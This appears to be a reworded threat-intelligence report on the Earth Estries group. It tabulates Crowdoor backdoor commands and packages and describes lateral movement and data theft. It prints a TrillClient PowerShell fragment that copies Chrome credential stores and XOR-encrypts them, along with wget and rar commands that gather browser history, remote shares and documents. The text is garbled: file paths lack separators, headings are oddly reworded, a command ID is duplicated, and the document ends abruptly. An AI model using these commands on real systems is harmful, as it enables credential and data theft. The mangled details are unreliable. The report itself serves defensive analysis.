Utilizing various arguments, Crowdoor executes different functions. The behaviors of the new Crowdoor variant are summarized in table 1 based on the arguments used. These behaviors closely resemble those of the older variant, except for the injected process (msiexec.exe) and Command IDs (displayed in table 2).
| Arguments | Operation |
|---|---|
| No argument | Establishes persistence through the registry Run key or a service and restarts the backdoor |
| 0 | Establishes persistence through the registry Run key or a service and restarts the backdoor. |
| 1 | Restarts the backdoor by injecting into ‘msiexec.exe’ |
| 2 | Calls the backdoor main function |
Table 1. Overview of arguments and operations
| Old Crowdoor variant | New Crowdoor variant | Functionalities |
|---|---|---|
| 0x2347135 | 0x11736212 | Initial connection C2 |
| 0x2347136 | 0x11736213 | Collect ComputerName,Username, OS version and hostnet or IP information |
| 0x2347137 | 0x11736214 | Remote shell |
| 0x234713B | 0x11736218 | Delete malware files, persistence and exit |
| 0x2347140 | 0x1173621D | File related Operation |
| 0x2347141 | 0x1173621E | Open/ReadFile |
| 0x2347142 | 0x1173621F | Open/WriteFile |
| 0x2347144 | 0x11736221 | Collect drive information |
| 0x2347145 | 0x11736222 | Search File |
| 0x2347148 | 0x11736225 | CreateDirectory |
| 0x2347149 | 0x11736226 | Rename file or directory |
| 0x234714A | 0x11736227 | Delete file or Directory |
| 0x234714A | 0x11736228 | Communication with C&C server |
Table 2. Comparative analysis of old and new Crowdoor versions
| Package 1 | Package 2 | Package 3 | Package 4 |
|---|---|---|---|
| WinStore.exe (Host) | K7Sysmon.exe (Host) | HxTsk.exe (Host) | MsMsRng.exe (Host) |
| Sqlite3.dll | K7Sysmn1.dll | d3d8.dll | sqlite3.dll |
| datastate.dll | K7Sysmn2.dll | HxTsk (encrypted) | msimg32.dll |
| datast.dll | K7Sysmn3.dll | datastate.dll | |
| WinStore (encrypted) | K7Sysmon.dll (encrypted) | MsMsRng (encrypted) |
Table 3. Crowdoor packages
Sideways Transit
Earth Estries employs PSExec to laterally deploy its backdoors and utilities, notably by duplicating the CAB files containing the backdoors or utilities, along with a batch file for the setup, persistence, and tool execution.
Primarily, PSExec is utilized for duplicating the CAB file containing the malware intended for lateral deployment. In some scenarios, WMIC may be utilized as an alternative to achieve comparable outcomes. A series of batch files are then duplicated and run to perform the extraction, installation, and execution of the malware. Batch files may also facilitate extensive data collection.
In advanced stages of the attack, the backdoors might directly facilitate lateral movement. CAB files continue to serve as receptacles for the tools to be deployed, and batch files are employed for extraction, installation, and execution of these tools. This process may sometimes involve establishing persistence mechanisms for the batch file to act as an indirect persistence point for the actual backdoors.
Exploration, aggregation and exfiltration
TrillClient’s user credential discovery
Earth Estries gathers user credentials to advance its objectives. The threat actor utilizes the TrillClient information stealer for this purpose, primarily harvesting user credentials from browser user profiles. TrillClient initiates a PowerShelll script responsible for collecting user profiles to be stored in a specified location:
foreach($win_user_path in $users_path) xcopy “C:Users$win_user_pathAppDataLocalGoogleChromeUser DataLocal State” “$copy_dest_path$win_user_pathLocal State” /C;
echo F
Data is extracted from the following directories:
- %LOCALAPPDATA%GoogleChromeUser DataLocal State
- %LOCALAPPDATA%GoogleChromeUser Data<PROFILE>Login Data
- %LOCALAPPDATA%GoogleChromeUser Data<PROFILE>NetworkCookies
- %APPDATA%MicrosoftProtect*
Temporary storage of data will happen in <%TEMP%browser_temp_data<RANDOM>>, archival through the tar directive, and encryption utilizing an XOR algorithm.
tar -cvf “$copy_dest_pathtar” $copy_dest_path;
$e_a = [System.IO.File]::ReadAllBytes(“$copy_dest_pathtar”);Remove-Item -Path $copy_dest_path -Recurse;
$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 – ($e_i % 199)));$e_i += 1;
$random_filename = “300775736611547784207972935122149919289871693”;
$out_put_file = $out_put_path + “” + $random_filename;
echo $out_put_file;
[System.IO.File]::WriteAllBytes($out_put_file, $e_a);
Data will be forwarded to the hacker’s Gmail account via Simple Mail Transfer Protocol (SMTP).
Sensitive document collection
RAR is employed by Earth Estries for gathering relevant data. In this particular scenario, wget is utilized to fetch target files from an internal web-based document management system and store them in a designated folder before archiving.
- In a specific case, a script is executed to download PDF files to the collection location with fixed document names:
- c:userspublicmusictempwget.exe -c “hxxp://172.16.xx.xx/{document path}/{Hardcoded Filename}.pdf” -P c:userspublicmusictemp
- Subsequently, the gathered PDFs are compressed
- C:Windowssystem32cmd.exe /C C:UsersPublicMusicrar.exe a -m5 C:UsersPublicMusicpdf0412.rar C:UsersPublicMusictemp*.pdf
Acquisition via hidden access point
Both Crowdoor and Cobalt Strike frameworks are utilized by Earth Estries for storing valuable data from both local and remote sources. Examples of routine data acquisition commands include:
| Sample directive | Operations |
|---|---|
| rar.exe a -m5 <install path>322.rar <remote machine>c$<remote path> | Retrieve Data collection from a distant machine by an older variant of malware |
| rar.exe a -m5 <install path> his231.rar “C:Users<username>AppDataLocalGoogleChromeUser DataDefaultHistory” | Retrieve browser history documents that interest the attackers in gaining more credentials |
| rar.exe a <install path>�311.rar C:users<user name>Desktop* C:users <user name> Downloads* C:users <user name> Documents* -r -y -ta<cutoff date> | Compiling Retrieve recent files and/or documents accessed by a local user |
Table 4. Data acquisition directives
Monitoring data indicates the data was moved out through the same avenues as the collection directives are initiated: either via the command-and-control (C&C) pathways of their access points, or through identical initial access routes to manage these utilities.
A depiction of the secondary Earth Estries assault progression is showcased in figure 3:
About Author
